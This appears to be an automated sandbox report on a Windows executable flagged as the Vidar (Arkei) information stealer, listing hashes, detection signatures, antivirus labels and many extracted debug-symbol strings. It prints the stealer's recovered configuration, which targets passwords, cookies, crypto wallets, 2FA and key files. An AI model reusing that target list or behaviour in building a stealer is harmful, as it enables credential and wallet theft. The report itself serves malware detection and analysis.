Windows Analysis Report cYKFZFK0Rg.exe

Overview

General Information

Sample Name: cYKFZFK0Rg.exe
Analysis ID: 491602
MD5: e9441b756f99ee3adf804214119c1fa1
SHA1: 8fe649e6bc868401ba2a3b9bf345fc76692f53d4
SHA256: f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd
Tags: ArkeiStealerexe
Infos:

Most interesting Screenshot:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Vidar
Yara detected Vidar stealer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
PE file contains sections with non-standard names
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged

Classification

AV Detection:

barindex
Found malware configuration
Source: HTTP data Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}
Multi AV Scanner detection for submitted file
Source: cYKFZFK0Rg.exe Virustotal: Detection: 25% Perma Link
Machine Learning detection for sample
Source: cYKFZFK0Rg.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.0.cYKFZFK0Rg.exe.2a60174.2.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.35.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.20.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.32.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.23.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.5.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.11.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.8.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.29.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.17.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.14.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.26.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.33.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Uses 32bit PE files
Source: cYKFZFK0Rg.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb+ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbjX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdbN source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb8 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb' source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdbfQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb`X source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb. source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb- source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbA source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdbc source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbr source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb( source: WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: bcrypt.pdb@ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbx source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb! source: WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: propsys.pdbU source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbF source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: aCnjrFnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000020.00000002.482493082.0000000002632000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbM source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbx source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb~ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb&XCG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdba source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb\XEG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbd source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbPXqG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbY source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbBXgG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbO source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb4 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbo source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb} source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb"Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbL source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbJ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdbt source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb? source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: schannel.pdbtQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbT source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb9 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb, source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000020.00000003.462921326.00000000029F3000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb: source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
